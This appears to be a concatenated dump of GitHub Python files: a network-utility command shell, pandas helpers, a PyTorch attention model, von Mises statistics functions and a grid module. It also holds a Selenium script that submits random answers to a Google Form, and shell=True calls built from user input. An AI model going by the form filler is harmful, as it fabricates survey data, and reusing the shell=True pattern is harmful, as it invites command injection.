putty_parser.add_argument('-p', '--port', type=str, default=\"22\", nargs='?', help='Destination port')\n putty_parser.add_argument('-l', '--username', type=str, default=\"admin\", nargs='?', help='Username')\n putty_parser.add_argument('-pw', '--password', type=str, nargs='?', help='SSH password')\n putty_parser.add_argument('-t', '--telnet', default=False, action='store_true', help='telnet session')\n @cmd2.with_argparser(putty_parser)\n def do_putty(self, args):\n if args.telnet == True:\n subprocess.Popen([PATH_TO_PUTTY, \"-telnet\", args.host], stdout=subprocess.PIPE)\n elif args.password == None:\n subprocess.Popen([PATH_TO_PUTTY, \"-ssh\", args.host, \"-l\", args.username, \"-P\", args.port], stdout=subprocess.PIPE)\n else:\n subprocess.Popen([PATH_TO_PUTTY, \"-ssh\", args.host, \"-l\", args.username, \"-pw\", args.password, \"-P\", args.port], stdout=subprocess.PIPE)\n\n # Binary to decimal conversion\n decimal_parser = cmd2.Cmd2ArgumentParser()\n decimal_parser.add_argument(dest='value', type=int, help='Binary to decimal conversion')\n @cmd2.with_argparser(decimal_parser)\n def do_decimal(self, args):\n decimal = 0\n power = 1\n while args.value > 0:\n resto = args.value%10\n args.value = args.value//10\n decimal += resto*power\n power = power*2\n print(decimal)\n\n # Decimal to binary conversion\n binary_parser = cmd2.Cmd2ArgumentParser()\n binary_parser.add_argument(dest='value', type=int, help='Decimal to binary conversion')\n @cmd2.with_argparser(binary_parser)\n def do_binary(self, args):\n print(bin(args.value)[2:])\n\n # Port/protocol finder\n portlist_parser = cmd2.Cmd2ArgumentParser()\n portlist_parser.add_argument(dest='value', help='Port or protocol')\n @cmd2.with_argparser(portlist_parser)\n def do_portlist(self, args):\n try:\n with open(PATH_TO_PORTS_CSV, 'r') as file:\n reader = csv.reader(file, delimiter=\",\")\n # isinstance is better than type\n if isinstance(args.value,str):\n for row in reader:\n if args.value in row:\n print(row[:4])\n else:\n for row in reader:\n if re.search(r'\\b' + args.value + r'\\b', str(row)):\n print(row[:4])\n except FileNotFoundError:\n print(f\"{PATH_TO_PORTS_CSV} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # tcpRTT calcs TCP RTT to a host using the tcp_latency library\n # common arguments like port number (443 by default), repetitions and timeout (both 5 and 1 by default)\n # if strict is specified only the latency is displayed, not the ping-like statistics\n latency_parser = cmd2.Cmd2ArgumentParser()\n 
latency_parser.add_argument(dest='host', type=str, help='Measure the TCP latency between you to a specified host. Port 443, 5 repetitions and 1 s timeout is the default)')\n latency_parser.add_argument('-p', '--port', type=int, default=443, nargs='?', help='Destination port')\n latency_parser.add_argument('-r', '--repeat', type=int, default=5, nargs='?', help='How many time measure_latency runs')\n latency_parser.add_argument('-t', '--timeout', type=int, default=1, nargs='?', help='Measure_latency timeout')\n latency_parser.add_argument('-s', '--strict', default=False, action='store_true', help='Strict output')\n @cmd2.with_argparser(latency_parser)\n def do_tcpRTT(self, args):\n #print (\"%s, %s, %s, %s, %s, %s\" % (bssid, channel, downRate, upRate, fq, signal))\n print(\"Repetitions: %s, Timeout: %s, Port: %s\" % (args.repeat, args.timeout, args.port))\n if args.strict:\n latency_results = measure_latency(host=args.host, runs=args.repeat, timeout=args.timeout, port=args.port)\n for i in latency_results:\n print(str(round(i,2)))\n else:\n measure_latency(host=args.host, runs=args.repeat, timeout=args.timeout, port=args.port, human_output=True)\n\n # Show interfaces:\n # default is eth\n # verbose and wifi with args\n iplist_parser = cmd2.Cmd2ArgumentParser()\n @cmd2.with_argparser(iplist_parser)\n def do_iplist(self, _): \n swiss_func.list_interfaces()\n\n # Show wifi statistics from netsh\n def do_wifistat(self, args):\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(\"%H:%M:%S\")\n netsh_wifi_stats = subprocess.run(['netsh', 'wlan', 'show', 'interfaces'], stdout=subprocess.PIPE)\n outStr = netsh_wifi_stats.stdout.decode('utf-8', 'ignore')\n if \"disconnessa\" in outStr:\n print(\"No Wi-fi connection\")\n elif \"Non disponibile\" in outStr:\n print(\"No Wi-fi connection\")\n else:\n # Need improvments\n for e in outStr.splitlines():\n if \"BSSID\" in e:\n bssid = e[29:]\n elif \"Canale\" in e:\n channel = e[27:]\n elif \"ricezione\" in e:\n downRate = e[32:]\n elif \"trasmissione\" in e:\n upRate = e[34:]\n elif \"frequenza\" in e:\n fq = e[29:]\n elif \"Segnale\" in e:\n signal = e[26:]\n\n #print (\"%s, %s, %s, %s, %s, %s\" % (bssid, channel, downRate, upRate, fq, signal))\n # Wifi statistics table from netsh\n wifi_table = Table(title=\"Wi-Fi statistics from netsh\")\n # Columns\n wifi_table.add_column(\"⏱️\", justify=\"center\", style=\"white\")\n wifi_table.add_column(\"BSSID\", justify=\"center\", style=\"white\")\n wifi_table.add_column(\"Download rate\", justify=\"center\", style=\"yellow\")\n wifi_table.add_column(\"Upload rate\", justify=\"center\", style=\"yellow\")\n wifi_table.add_column(\"Protocol\", justify=\"center\", style=\"green\")\n wifi_table.add_column(\"Channel\", justify=\"center\", style=\"green\")\n wifi_table.add_column(\"Signal\", justify=\"center\", style=\"green\")\n # Rows\n wifi_table.add_row(CLOCK_TIME, bssid, downRate, upRate, fq, channel, signal)\n RICH_CONSOLE.print(wifi_table)\n\n # Show my public IP address\n pubip_parser = cmd2.Cmd2ArgumentParser()\n pubip_parser.add_argument('-v', '--verbose', default=False, action='store_true', help='show ip public info from ifconfing.co API')\n @cmd2.with_argparser(pubip_parser)\n def do_pub(self, args):\n if args.verbose:\n try:\n print(\"Verbose API call\")\n print(requests.get(\"http://ifconfig.co/json\").json())\n except Exception as e:\n print(f\"An error occurred: {e}\")\n else:\n try:\n print(requests.get(\"https://api.ipify.org?format=text\").text)\n except Exception as e:\n 
print(f\"An error occurred: {e}\")\n # Ping using pythonping + if spw argument is specified the script try to open a shell pinging (NOT WORKING NEEDS ATTENTION)\n # Using uname_output we can check if we are in a Linux o Win machine\n ping_parser = cmd2.Cmd2ArgumentParser()\n ping_parser.add_argument(dest='address', type=str, help='IP Address')\n ping_parser.add_argument('-r', '--repeat', type=int, default=3, nargs='?', help='output [n] times')\n ping_parser.add_argument('-spw', '--spawn', default=False, action=\"store_true\")\n ping_parser.add_argument('-t', '--loop', default=False, action=\"store_true\")\n @cmd2.with_argparser(ping_parser)\n def do_ping(self, args):\n if OPERATING_SYSTEM == \"Windows\":\n if args.spawn:\n subprocess.run([\"start\", \"cmd\", \"/K\", \"ping\", \"-t\", args.address], shell=True)\n else:\n if args.loop == False:\n for i in range(0, args.repeat):\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\n print(CLOCK_TIME, end =\" \")\n ping(args.address, verbose=True, count=1, interval=1)\n else:\n while True:\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\n print(CLOCK_TIME, end =\" \")\n ping(args.address, verbose=True, count=1, interval=1)\n else:\n if args.spawn:\n subprocess.Popen('x-terminal-emulator -e \"bash -c \\\\\"ping 1.1.1.1; exec bash\\\\\"\"', shell=True)\n\n # Opening a list of programs with external bat if OS is Windows\n # https://builtin.com/software-engineering-perspectives/python-progress-bar\n openapps_parser = cmd2.Cmd2ArgumentParser()\n @cmd2.with_argparser(openapps_parser)\n def do_openapps(self, _):\n if OPERATING_SYSTEM == \"Windows\":\n try:\n with open(OPENAPPS_SCRIPT, 'r') as file:\n line_list = file.read().splitlines()\n for i in line_list: print (i)\n except FileNotFoundError:\n print(f\"{OPENAPPS_SCRIPT} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n with MoonSpinner('CTRL+C to stop openapps.bat') as bar:\n for i in range(6):\n sleep(0.5)\n bar.next()\n subprocess.call([OPENAPPS_SCRIPT])\n else:\n print(OPERATING_SYSTEM)\n\n\n\n # Grepping file from the GREP_FOLDER pat; needs improvements\n grep_parser = cmd2.Cmd2ArgumentParser()\n grep_parser.add_argument(dest='value', type=str, help='String to find in file')\n grep_parser.add_argument('-f', '--filename', type=str, help='Just the filename')\n #grep_parser.add_argument('-fp', '--filepath', type=str, help='Just the filename')\n @cmd2.with_argparser(grep_parser)\n def do_grep(self, args):\n print(\"File: \" + str(GREP_FOLDER) + args.filename)\n try:\n with open(str(GREP_FOLDER) + \"/\" + args.filename, 'r') as file:\n line_list = file.read().splitlines()\n for i in line_list:\n if args.value in i:\n print(i)\n except FileNotFoundError:\n print(f\"The file {args.value} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Change ip on Windows with command line\n changeip_parser = cmd2.Cmd2ArgumentParser()\n changeip_parser.add_argument(dest='interface_name', type=str, help='Interface name like \"Ethernet\"')\n changeip_parser.add_argument('-dhcp', '--dhcp', default=False, action=\"store_true\", help=\"Change ip to static/dynamic using netsh\")\n @cmd2.with_argparser(changeip_parser)\n def do_changeip(self, args):\n if OPERATING_SYSTEM == \"Windows\":\n if args.dhcp == False:\n # Collect\n print(\"Working on interface: \" + args.interface_name)\n input_ipv4 = input(\"IP address: \")\n input_subnet = input(\"Subnet mask: \")\n input_gateway = 
input(\"Gateway: \")\n subprocess.run([\"netsh\", \"interface\", \"ipv4\", \"set\", \"address\", \"name=\" + args.interface_name, \"static\", input_ipv4, input_subnet, input_gateway], shell=True)\n else:\n # -dhcp is True then set the interface to dhcp\n subprocess.run([\"netsh\", \"interface\", \"ipv4\", \"set\", \"address\", \"name=\" + args.interface_name, \"source=dhcp\"], shell=True)\n else:\n print(OPERATING_SYSTEM)\n \n # WLC Debug parser\n debug_parser = cmd2.Cmd2ArgumentParser()\n debug_parser.add_argument('-f', '--filename', type=str, default='debug_parser/debugTrace_1.txt', help='File path to debug trace file, default is debug_parser/debugTrace_1.txt')\n debug_parser.add_argument('-id', '--idname', type=str, default=CURRENT_TIME.strftime(\"%H%M%S\"), help='Set the table name, default is the time as %H%M%S')\n debug_parser.add_argument('-t', '--template', type=str, default=(\"state\"), choices=[\"state\", \"EAP\", \"reasons\", \"association\", \"timeouts\"], help='Select a template to parse the debug file in the db')\n @cmd2.with_argparser(debug_parser)\n def do_debug(self, args):\n swiss_func.debug_to_db(args.filename, args.idname)\n\n # Test command\n hello_parser = cmd2.Cmd2ArgumentParser()\n hello_parser.add_argument('-name', type=str, default='Robot', help='A nice hello to test functions')\n hello_parser.add_argument('-surname', type=str, default='Spaceship', help='A nice hello to test functions')\n hello_parser.add_argument('-t', '--template', type=str, default='red', choices=[\"red\", \"green\", \"blue\"], help='Select a hello template')\n @cmd2.with_argparser(hello_parser)\n def do_hello(self, args):\n swiss_func.hello_world(args.name, args.surname, args.template)\n\n # Open a URL in a new tab in Firefox\n fire_parser = cmd2.Cmd2ArgumentParser()\n fire_parser.add_argument('-url', type=str, default='https://www.cyberciti.biz/faq/howto-run-firefox-from-the-command-line/', help='Opening tabs in Firefox from the commandline')\n #fire_parser.add_argument('-surname', type=str, default='Spaceship', help='A nice fire to test functions')\n @cmd2.with_argparser(fire_parser)\n def do_fire(self, args):\n try:\n webbrowser.get(\"firefox\").open_new_tab(args.url)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Dividing commands in categories (help command)\n categorize((do_debug), \"WLC debug parser\")\n categorize((do_pub, do_iplist, do_macvendor, do_tcpRTT, do_wifistat, do_nslookup, do_portlist, do_ipcheck, do_ping, do_changeip), \"Network\")\n categorize((do_binary, do_decimal, do_subnet), \"Calc\")\n categorize((do_putty), \"SSH\")\n categorize((do_grep), \"Files\")\n categorize((do_fire, do_openapps), \"Browser and apps\")\n categorize((do_time, do_hello), \"Miscellanea\")\n\nif __name__ == '__main__':\n import sys\n c = SwissKnife()\n sys.exit(c.cmdloop())\n","repo_name":"lu-tar/swiss-knife","sub_path":"swiss_shell.py","file_name":"swiss_shell.py","file_ext":"py","file_size_in_byte":17956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34243885921","text":"\r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\r\n\r\nfrom IPython.display import display\r\n\r\nfrom sklearn import metrics\r\n\r\nimport numpy as np \r\n\r\ndef display_all(df):\r\n display(df)\r\n\r\ndef add_datepart(df, fldname):\r\n fld = df[fldname]\r\n targ_pre = re.sub('[Dd]ate$', '' , fldname)\r\n for n in ('Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear',\r\n 'Is_month_end', 'Is_month_start', 
'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start'):\r\n df[targ_pre+n] = getattr(fld.dt,n.lower())\r\n df[targ_pre+'Elapse'] = (fld - fld.min()).dt.days\r\n df.drop(fldname, axis=1, inplace=True)\r\n\r\ndef train_cats(df):\r\n for n,c in df.items():\r\n if is_string_dtype(c): df[n] = c.astype('category').cat.as_ordered()\r\n","repo_name":"chukwumaokere/tldr.ai","sub_path":"structured.py","file_name":"structured.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7687372197","text":"class flat:\r\n def __init__(self,name,age,year):\r\n self.name= name\r\n self.age= age\r\n self.year= year\r\na= flat(\"naman\",19,\"1st year\")\r\nb= flat(\"chirag\",18,\"1st year\")\r\n\r\nprint(a.__dict__,b.__dict__)\r\nclass partner(flat):\r\n def __init__(self,name,age,year,contact):\r\n self.name= name\r\n self.age= age\r\n self.year= year\r\n self.contact= contact\r\nc= partner(\"shreyas\",\"18\",\"1st\",100)\r\nprint(c.__dict__)\r\n\r\n ","repo_name":"prabalgautam05/prabal-gautam","sub_path":"oops.py","file_name":"oops.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42832854346","text":"from selenium import webdriver\nimport time\nimport random\n\n# Opciones de navegación\noptions = webdriver.ChromeOptions()\noptions.add_argument('--start-maximized')\noptions.add_argument('--disable-extensions')\n\ndriver_path = 'C:\\\\Users\\\\Ruben\\\\Desktop\\\\PROG\\\\chromedriver.exe'\n\ndriver = webdriver.Chrome(driver_path, chrome_options = options)\ntime.sleep(1)\n\n#Damos la url a la que queremos scrappear\nurl = 'https://docs.google.com/forms/d/e/1FAIpQLSc8WWN_IW9KeSqLx6fEhmFKzXZXrPqP4MkAZXQKKpKZ1O87gw/viewform'\n#Iniciamos el navegador\ndriver.get(url)\n\n\ndef fill_forms (ans1, ans2, ans3, ans4, ans5, ans6, ans7, ans8, ans9):\n question1 = None\n question2 = None\n question3 = None\n question4 = None\n question5 = None\n question6 = None\n question7 = None\n question8 = None\n question9 = None\n \n questionGroup = driver.find_elements_by_class_name(\"Qr7Oae\")\n\n if questionGroup:\n question1 = questionGroup[0].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question2 = questionGroup[1].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question3 = questionGroup[2].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question4 = questionGroup[3].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question5 = questionGroup[4].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question6 = questionGroup[5].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question7 = questionGroup[6].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question8 = questionGroup[7].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question9 = questionGroup[8].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n\n if question1:\n question1[int(ans1)].click()\n if question2:\n question2[int(ans2)].click()\n if question3:\n question3[int(ans3)].click()\n if question4:\n question4[int(ans4)].click()\n if question5:\n question5[int(ans5)].click()\n if question6:\n question6[int(ans6)].click()\n if question7:\n question7[int(ans7)].click()\n if question8:\n question8[int(ans8)].click()\n if question9:\n question9[int(ans9)].click()\n\n submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div/div[1]/div/span/span')\n submit.click()\n\n driver.close()\n\n\nbutton_range1 = random.randint(0,3)\nbutton_range2 = 
random.randint(0,4)\nbutton_range3 = 0\nbutton_range4 = random.randint(0,2)\nbutton_range5 = 0\nbutton_range6 = 0\nbutton_range7 = random.randint(0,2)\nbutton_range8 = random.randint(0,2)\nbutton_range9 = random.randint(0,1)\n\nfill_forms(button_range1, button_range2, button_range3, button_range4, button_range5, button_range6, button_range7, button_range8, button_range9)","repo_name":"RubenM19/Selenium_FillForms---Python","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"20968883872","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .dualencodernet import DualEncoderNet\n\n\nclass DualEncoderAttentionNet(DualEncoderNet):\n    \"\"\"DualEncoderAttentionNet\n    Args:\n        dim_embedding (int): The number of features in the input word embeddings.\n        rnn_module (str): The module for rnn (LSTM/GRU).\n        hidden_size (int): The number of features in the hidden state h.\n        num_layers (int): Number of recurrent layers. E.g., setting num_layers=2 would mean stacking two GRUs together to form a stacked GRU, with the second GRU taking in outputs of the first GRU and computing the final results.\n        dropout (int): If non-zero, introduces a Dropout layer on the outputs of each GRU layer except the last layer, with dropout probability equal to dropout\n        bidirectional (bool): If True, becomes a bidirectional GRU.\n    \"\"\"\n    def __init__(self, dim_embedding, rnn_module='GRU', hidden_size=64, num_layers=1, dropout=0, bidirectional=False):\n        super(DualEncoderAttentionNet, self).__init__(dim_embedding, rnn_module, hidden_size, num_layers, dropout, bidirectional)\n        del self.rnn, self.context_to_option\n        self.rnn0 = self.rnn_module(input_size=dim_embedding,\n                                    hidden_size=hidden_size,\n                                    num_layers=num_layers,\n                                    dropout=dropout,\n                                    bidirectional=bidirectional)\n        self.rnn1 = self.rnn_module(input_size=4*hidden_size if bidirectional else 2*hidden_size,\n                                    hidden_size=hidden_size,\n                                    num_layers=num_layers,\n                                    dropout=dropout,\n                                    bidirectional=bidirectional)\n        self.attention = Attention(hidden_size, bidirectional)\n        \n        # transform option to \"contexted\" space for better similarity comparison\n        features = 4 * hidden_size if bidirectional else 2 * hidden_size\n        self.context_to_option = nn.Sequential(nn.Linear(features, features),\n                                               nn.ReLU(inplace=True),\n                                               nn.Linear(features, features))\n        \n        for name, param in self.rnn0.named_parameters():\n            if 'weight' in name and param.requires_grad:\n                nn.init.orthogonal_(param) \n        for name, param in self.rnn1.named_parameters():\n            if 'weight' in name and param.requires_grad:\n                nn.init.orthogonal_(param)\n    \n    def forward(self, context, context_len, options, option_lens):\n        \"\"\"\n        The DialogDataset generate context and options\n        Args:\n            context (tensor): (batch, padded_context_len, dim_embedding) padded_context_len = max(context_len)\n            context_len (tensor): (batch, ) original length of the context\n            options (tensor): (batch, n_samples, padded_option_len, dim_embedding) padded_option_len = max(option_lens)\n            option_lens (tensor): (batch, n_samples) original length of the options\n        \"\"\"\n        # features = num_directions * hidden_size, num_directions = 2 if bidirectional else 1\n        context_output = self.packed_forward(self.rnn0, context.transpose(1, 0), context_len) # context_output: (padded_context_len, batch, features)\n        attentioned_context = torch.cat([context_output, context_output], dim=-1)\n        attentioned_context_output = 
self.packed_forward(self.rnn1, attentioned_context, context_len) # attentioned_context_output: (padded_context_len, batch, features)\n \n # concatenate two pooling mode features, condensed_context_output: (batch, 2*features)\n condensed_context_output = torch.cat([self.pooling(attentioned_context_output, context_len, pooling_mode='last'),\n self.pooling(attentioned_context_output, context_len, pooling_mode='max')], dim=-1)\n condensed_context_output = self.context_to_option(condensed_context_output)\n \n logits = []\n for option, option_len in zip(options.transpose(1, 0), option_lens.transpose(1, 0)):\n option_output = self.packed_forward(self.rnn0, option.transpose(1, 0), option_len) # option_output: (padded_option_len, batch, features)\n attentioned_option = self.attention(context_output, context_len, option_output, option_len) # attentioned_option: (padded_option_len, batch, features)\n \n # interaction: concatenate the features before and after the attention\n attentioned_option = torch.cat([option_output, attentioned_option], dim=-1)\n attentioned_option_output = self.packed_forward(self.rnn1, attentioned_option, option_len) # attentioned_option_output: (padded_option_len, batch, features)\n \n # concatenate two pooling mode features, condensed_option_output: (batch, 2*features)\n condensed_option_output = torch.cat([self.pooling(attentioned_option_output, option_len, pooling_mode='last'),\n self.pooling(attentioned_option_output, option_len, pooling_mode='max')], dim=-1)\n \n # compute the similarity by inner product and sigmoid normalization, logit: (batch,)\n logit = torch.sigmoid((condensed_context_output * condensed_option_output).sum(dim=-1))\n logits.append(logit)\n logits = torch.stack(logits, dim=1) # logits: (batch, n_samples)\n return logits\n \n\nclass Attention(nn.Module):\n \"\"\"Attention: attention layer proposed by Luong et al. 
\n    ref: https://pytorch.org/tutorials/beginner/chatbot_tutorial.html#decoder\n    Args: \n        hidden_size (int): refer to DualEncoderAttentionNet's argument\n        bidirectional (bool): refer to DualEncoderAttentionNet's argument\n    \"\"\"\n    def __init__(self, hidden_size=64, bidirectional=False):\n        super(Attention, self).__init__()\n        self.hidden_size = hidden_size\n        self.bidirectional = bidirectional\n        self.option_attention_weights = torch.randn([100, 50, 350], requires_grad=True) # the attention map\n        \n        # transform option to \"contexted\" space for better similarity comparison\n        if bidirectional:\n            self.option_to_context = nn.Sequential(nn.Linear(2 * hidden_size, 2 * hidden_size, bias=False),\n                                                   nn.ReLU(inplace=True),\n                                                   nn.Linear(2 * hidden_size, 2 * hidden_size, bias=False))\n        else:\n            self.option_to_context = nn.Sequential(nn.Linear(hidden_size, hidden_size, bias=False),\n                                                   nn.ReLU(inplace=True),\n                                                   nn.Linear(hidden_size, hidden_size, bias=False))\n    \n    def forward(self, context, context_len, option, option_len):\n        \"\"\"\n        Args:\n            context: (padded_context_len, batch, features)\n            context_len (tensor): (batch, ) original length of the context\n            option: (padded_option_len, batch, features)\n            option_len (tensor): (batch, ) original length of the option\n        \"\"\"\n        contexted_option = self.option_to_context(option.transpose(1, 0)) # contexted_option: (batch, padded_option_len, features)\n        \n        # compute similarity by inner product, context.transpose(1, 0): (batch, padded_context_len, features), contexted_option.transpose(2, 1): (batch, features, padded_option_len), energies: (batch, padded_context_len, padded_option_len)\n        energies = torch.bmm(context.transpose(1, 0), contexted_option.transpose(2, 1))\n        \n        # compute attention weights by applying softmax, option_attention_weights: (batch, padded_option_len, padded_context_len)\n        self.option_attention_weights = F.softmax(energies, dim=1).transpose(2, 1)\n        \n        # attentioned_option: (padded_option_len, batch, features) \n        attentioned_option = torch.bmm(self.option_attention_weights, context.transpose(1, 0)).transpose(1, 0)\n        return attentioned_option\n","repo_name":"peter850706/A-retrieval-based-chatbot","sub_path":"src/modules/dualencoderattentionnet.py","file_name":"dualencoderattentionnet.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"16220138274","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy.integrate as integrate\nfrom scipy.optimize import brentq as root\nimport math\nimport numpy as np\nimport scipy.special as scp\nfrom scipy.special import iv\n\n\n# In[2]:\n\n\ndef rvonmises(n, mu, kappa):\n    vm = np.zeros(n)\n    a = 1 + (1 + 4 * (kappa**2))**0.5\n    b = (a - (2 * a)**0.5)/(2 * kappa)\n    r = (1 + b**2)/(2 * b)\n    obs = 0\n    while (obs < n):\n        U1 = np.random.uniform(0, 1, 1)\n        z = np.cos(np.pi * U1)\n        f = (1 + r * z)/(r + z)\n        c = kappa * (r - f)\n        U2 = np.random.uniform(0, 1, 1)\n        if (c * (2 - c) - U2 > 0):\n            U3 = np.random.uniform(0, 1, 1)\n            vm[obs] = np.sign(U3 - 0.5) * math.acos(f) + mu\n            vm[obs] = vm[obs] % (2 * np.pi)\n            obs = obs + 1\n        else:\n            if (math.log(c/U2) + 1 - c >= 0):\n                U3 = np.random.uniform(0, 1, 1)\n                vm[obs] = np.sign(U3 - 0.5) * math.acos(f) + mu\n                vm[obs] = vm[obs] % (2 * math.pi)\n                obs = obs + 1\n    return(vm)\n\n\n# In[3]:\n\n\ndef dvonmises(x, mu, kappa, log = False):\n    if (type(x) == int):\n        x = [x]\n    if (type(x) == float):\n        x = [x]\n    vm = np.zeros(len(x))\n    if (log):\n        if (kappa == 
0):\n            vm = np.log(np.repeat(1/(2*np.pi), len(x)))\n        elif (kappa < 100000):\n            vm = -(np.log(2*math.pi)+np.log(scp.ive(0, kappa)) + kappa) + kappa*(np.cos(np.subtract(x, mu)))\n        else:\n            if (((x-mu)%(2*math.pi))==0):\n                vm = math.inf\n            else:\n                vm = -math.inf\n    else:\n        if (kappa == 0):\n            vm = np.repeat(1/(2*np.pi), len(x))\n        elif (kappa < 100000):\n            vm = 1/(2 * np.pi * scp.ive(0, kappa)) * (np.exp(np.subtract(np.cos(np.subtract(x, mu)), 1)))**kappa\n        else:\n            if (np.mod(np.subtract(x, mu),(2*np.pi))==0):\n                vm = math.inf\n            else:\n                vm = 0\n    return(vm)\n\n\n# In[21]:\n\n\ndef pvonmises(q, mu, kappa, tol = 1e-020):\n    from_ = mu - np.pi\n    mu = (mu - from_) % (2 * np.pi)\n    if (type(q) == int):\n        q = [q]\n    if(type(q) == float):\n        q =[q]\n    q = np.mod(np.subtract(q, from_), (2 * np.pi))\n    q = np.mod(q,(2 * np.pi))\n    n = len(q)\n    mu = mu % (2 * np.pi)\n    def pvm_mu0(q, kappa, tol):\n        flag = True\n        p = 1\n        sum_ = 0\n        while (flag):\n            term = (iv(p, kappa) * np.sin(np.multiply(q, p)))/p\n            sum_ = sum_ + term\n            p = p + 1\n            if (abs(term) < tol):\n                flag = False\n        return(np.divide(q,(2 * np.pi)) + sum_/(np.pi * iv(0, kappa)))\n\n    result = np.repeat(np.nan, n)\n    if (mu == 0):\n        for i in range(0,n):\n            result[i] = pvm_mu0(q[i], kappa, tol)\n    else:\n        for i in range(0,n):\n            if (q[i] <= mu):\n                upper = (q[i] - mu) % (2 * np.pi)\n                if (upper == 0):\n                    upper = 2 * np.pi\n                lower = (-mu) % (2 * np.pi)\n                result[i] = pvm_mu0(upper, kappa, tol) - pvm_mu0(lower, kappa, tol)\n            else:\n                upper = q[i] - mu\n                lower = mu % (2 * np.pi)\n                result[i] = pvm_mu0(upper, kappa, tol) + pvm_mu0(lower, kappa, tol)\n    return(result)\n\n\n# In[63]:\n\n\ndef qvonmises(p, mu = 0 , kappa = None, from_ = None, tol = np.finfo(float).eps**0.6):\n    epsilon = 10 * np.finfo(float).eps ##epsilon is Python equivalent of .Machine$double.eps\n    if (type(p) == int):\n        p = np.array([p])\n    elif (type(p) == float):\n        p = np.array([p])\n    else:\n        p = np.array(p)\n    if (np.any(p > 1)): \n        raise ValueError(\"p must be in [0,1]\")\n    elif (np.any(p < 0)):\n        raise ValueError(\"p must be in [0,1]\")\n\n    if (pd.isnull(from_)):\n        from_ = mu - np.pi\n    \n    n = p.size\n    mu = (mu - from_)%(2 * np.pi) \n    if (pd.isnull(kappa)): \n        raise ValueError(\"kappa must be provided\") \n    \n    def zeroPvonmisesRad(x, p, mu, kappa):\n        if (np.isnan(x)): \n            y = np.nan \n        else: \n            integration = integrate.quad(lambda x: dvonmises(x, mu, kappa), 0, x)\n            y = integration[0] - p ##integration[0] will give the value\n        return(y);\n    \n    value = np.repeat(np.nan, p.size)\n    for i in range(p.size):\n        try:\n            value[i] = root(lambda x: zeroPvonmisesRad(x, p[i], mu, kappa), 0, 2 * np.pi - epsilon)\n        except:\n            pass\n        if(p[i] < (10 * epsilon)):\n            value[i] = 0\n        elif (p[i] > (1 - 10 * epsilon)):\n            value[i] = 2 * np.pi - epsilon \n    value += from_\n    return(value)\n\n","repo_name":"vedantmehta2808/vonMises-Package-Python","sub_path":"vonMises.py","file_name":"vonMises.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"23667255320","text":"from queue import PriorityQueue\nfrom dataclasses import dataclass\nfrom math import ceil, log\n\nimport numpy as np\nfrom .constants import MAP_SYMBOLS, MAP_VALUES\n\n\n@dataclass\nclass Node:\n    coords: (int, int)\n    obstacle: bool\n    price: int = float(\"inf\")\n    visited: bool = False\n\n    def enter(self, parent):\n        self.price = parent.price + self.distance(parent)\n\n    def distance(self, other):\n        sigma = np.power(self.coords[0] - other.coords[0], 2)\n        sigma += np.power(self.coords[1] - 
other.coords[1], 2)\n return np.sqrt(sigma)\n\n def neighbours(self, width, height):\n valid_coords = []\n for x in [-1, 0, 1]:\n for y in [-1, 0, 1]:\n if 0 <= self.coords[0] + x < width and 0 <= self.coords[1] + y < height:\n if x == 0 and y == 0:\n continue\n valid_coords.append((self.coords[0] + x, self.coords[1] + y))\n return valid_coords\n\n def __lt__(self, other):\n return self.price < other.price\n\n\ndef create_grid(width, height, gate=None):\n if width < 3 or height < 3:\n raise ValueError(\"Map cannot have dimensions lower than 3 due to walls\")\n dimensions = (height, width)\n grid = np.zeros(shape=dimensions)\n grid[:, 0] = -1\n grid[:, -1] = -1\n grid[0, :] = -1\n grid[-1, :] = -1\n if gate:\n x, y = gate\n if 0 < x < width and 0 < y < height:\n np_coords = (y, x)\n grid[np_coords] = 100\n else:\n raise ValueError(\"Gate in invalid position \"+str(gate)+\" in grid \" + str(dimensions))\n return grid\n\n\ndef load_grid(filename):\n with open(filename) as f:\n dimensions = list(map(int, f.readline().split()))\n width, height = dimensions\n dimensions = height, width\n grid = np.zeros(shape=dimensions)\n for row in range(height):\n line = f.readline().strip()\n for column, c in enumerate(line):\n if c not in MAP_SYMBOLS:\n raise ValueError(\"Unknown character when loading map from file\")\n np_coords = (row, column)\n grid[np_coords] = MAP_SYMBOLS[c]\n return grid\n\n\ndef save_grid(grid, 